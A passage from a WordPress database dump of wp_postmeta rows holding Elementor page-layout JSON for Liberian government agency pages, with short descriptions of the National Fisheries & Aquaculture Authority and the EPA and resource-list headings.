\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e84457\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"57f59e6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b007c95\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9442,1647,'_elementor_controls_usage','a:0:{}'),(9443,1647,'_elementor_edit_mode','builder'),(9444,1647,'_elementor_template_type','wp-post'),(9445,1647,'_elementor_version','2.7.5'),(9446,1647,'_wp_page_template','default'),(9447,1647,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LISGIS Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7881895\",\"elType\":\"widget\",\"settings\":{\"title\":\"Departments\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9448,1648,'_elementor_controls_usage','a:0:{}'),(9449,1648,'_elementor_edit_mode','builder'),(9450,1648,'_elementor_template_type','wp-post'),(9451,1648,'_elementor_version','2.7.5'),(9452,1648,'_wp_page_template','default'),(9453,1648,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LISGIS Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7881895\",\"elType\":\"widget\",\"settings\":{\"title\":\"Departments\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9454,1649,'_elementor_edit_mode','builder'),(9455,1649,'_elementor_template_type','wp-post'),(9456,1649,'_elementor_version','2.7.5'),(9457,1649,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (9458,1649,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1bb94b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0171c3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9460,1582,'_edit_lock','1631060181:38'),(9461,1544,'_edit_lock','1646908322:42'),(9462,1650,'_elementor_controls_usage','a:0:{}'),(9463,1650,'_elementor_edit_mode','builder'),(9464,1650,'_elementor_template_type','wp-post'),(9465,1650,'_elementor_version','2.7.5'),(9466,1650,'_wp_page_template','default'),(9467,1650,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"EPA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:epa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9468,1651,'_elementor_controls_usage','a:0:{}'),(9469,1651,'_elementor_edit_mode','builder'),(9470,1651,'_elementor_template_type','wp-post'),(9471,1651,'_elementor_version','2.7.5'),(9472,1651,'_wp_page_template','default'),(9473,1651,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\